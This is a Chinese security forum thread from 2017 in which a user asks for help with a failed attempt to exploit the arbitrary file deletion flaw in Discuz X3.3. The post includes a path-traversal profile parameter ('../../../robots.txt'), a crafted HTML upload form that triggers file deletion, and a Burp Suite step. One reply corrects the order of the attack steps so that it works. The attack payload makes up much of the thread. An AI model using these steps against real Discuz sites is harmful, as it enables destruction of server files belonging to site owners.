首页
社区
课程
招聘
未解决 [悬赏]discuz x3.3任意文件删除漏洞删除失败 10.00雪花
发表于: 2017-10-2 03:20 5838

未解决 [悬赏]discuz x3.3任意文件删除漏洞删除失败 10.00雪花

2017-10-2 03:20
5838
①构造提交
http://dz.com/3.3/home.php?mod=spacecp&ac=profile&op=base

 birthprovince=../../../robots.txt&profilesubmit=1&formhash=30ff14a7


②上传 robots.txt文件
<formaction="home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST"enctype="multipart/form-data"> <inputtype="file"name="birthprovince"id="file"/>
 <inputtype="text"name="formhash"value="30ff14a7"/></p>
 <inputtype="text"name="profilesubmit"value="1"/></p>
 <inputtype="submit"value="Submit"/>
</form>

③burpsuite改包



问  ① : 改了如图 请问哪里操作失误 才不行的
问 ②  :spacecp/spacecp_profile.php里的$_G['cache']['profilesetting']是哪里来的

[课程]Linux pwn 探索篇!

收藏
免费 0
支持
分享
最新回复 (4)
雪    币: 22
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
看雪不行了  一个人都没有
2017-10-2 11:20
0
雪    币: 22
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
这就是传说中的看学  无人回答
2017-10-6 20:40
0
雪    币: 878
活跃值: (496)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
4
你在漏洞代码unlink前打印$space[$key]出来看看不就知道了
2017-10-6 21:15
0
雪    币: 1
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
步骤错了,抓包也抓错了,先上传一个文件,再修改个人资料抓包,找一个参数如birthprovince修改成上传的文件路径,(../../../test.txt的形式),然后再提交②的post表单并不是抓包,这个表单是删除文件的操作。
2017-10-9 15:36
0
游客
登录 | 注册 方可回帖
返回
//